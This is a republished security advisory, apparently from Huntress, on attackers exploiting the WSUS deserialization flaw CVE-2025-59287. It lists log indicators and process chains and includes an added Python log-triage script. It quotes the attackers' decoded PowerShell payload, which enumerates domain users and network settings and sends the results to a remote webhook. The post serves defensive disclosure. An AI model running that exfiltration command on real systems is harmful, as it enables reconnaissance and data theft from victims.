
Exploitation of Windows Server Update Services Remote Code Execution Vulnerability (CVE-2025-59287)

This page was created programmatically; to read the article in its original location you can visit the link below:
https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability
and if you wish to remove this text from our website please contact us


TL;DR: Huntress has observed threat actors exploiting a Microsoft Windows Server Update Services (WSUS) vulnerability across four customers; organizations should apply the update from Microsoft as soon as possible.

Summary

On October 23, Microsoft released an out-of-band update for a remote code execution bug in Windows Server Update Services (WSUS); WSUS is a centralized Microsoft update distribution service for IT administrators.

Starting around 2025-10-23 23:34 UTC, Huntress observed threat actors targeting WSUS instances publicly exposed on their default ports (8530/TCP and 8531/TCP) to exploit a deserialization vulnerability via the AuthorizationCookie (CVE-2025-59287).

Observed attacker behaviour:

  • Attackers leveraged exposed WSUS endpoints to send specially crafted requests (several POST calls to WSUS web services) that triggered a deserialization RCE against the update service.
  • Exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and the WSUS service binary (process chains observed):

    • wsusservice.exe → cmd.exe → cmd.exe → powershell.exe

    • w3wp.exe → cmd.exe → cmd.exe → powershell.exe

  • A base64-encoded payload was decoded and executed in PowerShell; the payload enumerated servers for sensitive network and user information and exfiltrated the results to a remote webhook.

  • Proxy networks were used by the attackers to conduct and obfuscate exploitation.

What is Windows Server Update Services?

Windows Server Update Services (WSUS) enables IT administrators to centrally manage and deploy Microsoft product updates. It provides a managed and fully controlled method for distributing updates released through Microsoft Update.

In the wild, we observed that Windows Servers with the default WSUS ports 8530/TCP (HTTP) and 8531/TCP (HTTPS) were being targeted by a threat actor to run a deserialization attack against the AuthorizationCookie, tracked as CVE-2025-59287 (https://nvd.nist.gov/vuln/detail/CVE-2025-59287).

The blog by Hawktrace (“CVE-2025-59287 — WSUS Unauthenticated Remote Code Execution” (https://hawktrace.com/blog/CVE-2025-59287-UNAUTH)) goes further into the proof of concept.

IOCs & Forensic Artifacts

C:\Program Files\Update Services\LogFiles\SoftwareDistribution.log

    at System.Data.DataSet.DeserializeDataSetSchema(SerializationInfo info, StreamingContext context,
    at System.Runtime.Serialization.ObjectManager.DoFixups()
    at System.Runtime.Serialization.ObjectManager.CompleteISerializableObject
    System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
    Error  WsusService.9  HmtWebServices.CheckReportingWebService  Reporting WebService WebException:System.Net.WebException: Unable to connect to the remote server

C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log

    POST /ReportingWebService/ReportingWebService.asmx (get_server_id)
    POST /SimpleAuthWebService/SimpleAuth.asmx (get_auth_cookie)
    POST /ClientWebService/Client.asmx (get_reporting_cookie)
    POST /ReportingWebService/ReportingWebService.asmx (send_malicious_event)
    POST /ApiRemoting30/WebService.asmx
    POST /ReportingWebService/ReportingWebService.asmx – 8530 – Windows-Update-Agent – 200
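A way to triage the two artifacts listed above, as an added example that is not part of the Huntress post or its Sigma rules: it parses IIS W3C log lines using the #Fields header, flags any client IP that POSTs to all four WSUS web-service paths seen in the exploitation sequence within a short window, and checks a SoftwareDistribution.log excerpt for the deserialization stack-trace markers. The IIS sample, the client IPs and the ten-minute window are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# WSUS web-service paths from the IIS log entries above. Constructed detection
# logic for illustration, not Huntress's own Sigma rules.
WSUS_PATHS = (
    "/SimpleAuthWebService/SimpleAuth.asmx",
    "/ClientWebService/Client.asmx",
    "/ReportingWebService/ReportingWebService.asmx",
    "/ApiRemoting30/WebService.asmx",
)
# Stack-trace fragments that accompany the AuthorizationCookie deserialization failure.
DESER_MARKERS = ("DeserializeDataSetSchema", "TargetInvocationException")

def parse_w3c(lines):
    """Yield one dict per IIS W3C extended log entry, keyed by the #Fields header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def flag_wsus_clients(lines, window=timedelta(minutes=10)):
    """Return client IPs that POSTed to every path in WSUS_PATHS within `window`."""
    first_seen = defaultdict(dict)  # ip -> {path: first timestamp}
    for rec in parse_w3c(lines):
        if rec.get("cs-method") != "POST" or rec.get("cs-uri-stem") not in WSUS_PATHS:
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        first_seen[rec["c-ip"]].setdefault(rec["cs-uri-stem"], ts)
    return sorted(ip for ip, seen in first_seen.items()
                  if len(seen) == len(WSUS_PATHS)
                  and max(seen.values()) - min(seen.values()) <= window)

def deserialization_errors(log_text):
    """True when a SoftwareDistribution.log excerpt carries both stack-trace markers."""
    return all(marker in log_text for marker in DESER_MARKERS)

# Constructed sample IIS log: one client hitting all four endpoints within seconds,
# and one ordinary WSUS client doing a normal check-in.
SAMPLE_IIS = """#Fields: date time c-ip cs-method cs-uri-stem s-port cs(User-Agent) sc-status
2025-10-23 23:34:01 203.0.113.10 POST /ReportingWebService/ReportingWebService.asmx 8530 Windows-Update-Agent 200
2025-10-23 23:34:02 203.0.113.10 POST /SimpleAuthWebService/SimpleAuth.asmx 8530 Windows-Update-Agent 200
2025-10-23 23:34:03 203.0.113.10 POST /ClientWebService/Client.asmx 8530 Windows-Update-Agent 200
2025-10-23 23:34:05 203.0.113.10 POST /ApiRemoting30/WebService.asmx 8530 Windows-Update-Agent 200
2025-10-23 23:40:00 10.0.0.25 POST /ClientWebService/Client.asmx 8530 Windows-Update-Agent 200
2025-10-23 23:40:01 10.0.0.25 POST /ReportingWebService/ReportingWebService.asmx 8530 Windows-Update-Agent 200
""".splitlines()
```

The Windows-Update-Agent user agent is what a legitimate WSUS client sends too, so the endpoint sequence and timing, not the user agent, carry the signal here.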

During tactical response engagements to active exploitation, Huntress noted proxy networks being leveraged to conduct exploitation.

Attacker Tradecraft

Beginning at around 2025-10-23 23:34 UTC, alerts were triggered for suspicious activity. It was observed that cmd.exe and powershell.exe were spawned via the grandparent processes of w3wp.exe and wsusservice.exe, performing enumeration on Windows servers.

Figure 1: wsusservice.exe → cmd.exe → cmd.exe → powershell.exe

The script decoded and executed a base64 payload that enumerated exposed servers for sensitive network and user data. The data was then sent to a remote webhook URL.

The PowerShell payload (with the base64 decoded) is as follows:

    powershell -ec
    try{$r= (&{echo https://[REDACTED]:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w="http://webhook.site/[REDACTED]";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w --data-binary $r}

Figure 2: w3wp.exe → cmd.exe → cmd.exe → powershell.exe

The view of the exfiltrated information on the webhook site:

Figure 3: The webhook website with exfiltrated command output

Figure 4: Example of curl.exe exfiltrating the output of ipconfig /all to the webhook website.

We expect exploitation of CVE-2025-59287 to be limited, since WSUS does not typically expose ports 8530 and 8531. Across our partner base, we have observed ~25 hosts susceptible.

Enumeration commands observed:

Remediations

Sigma Rules


Indicators of Compromise

Item / Description

C:\Program Files\Update Services\LogFiles\SoftwareDistribution.log
    WSUS log file to review for indicators of compromise

C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log
    HTTP service log files to review for indicators of compromise

w3wp.exe
    HTTP worker process binary

wsusservice.exe
    WSUS service process binary

whoami;net user /domain
    Observed enumeration command

net user /domain; ipconfig /all
    Observed enumeration command
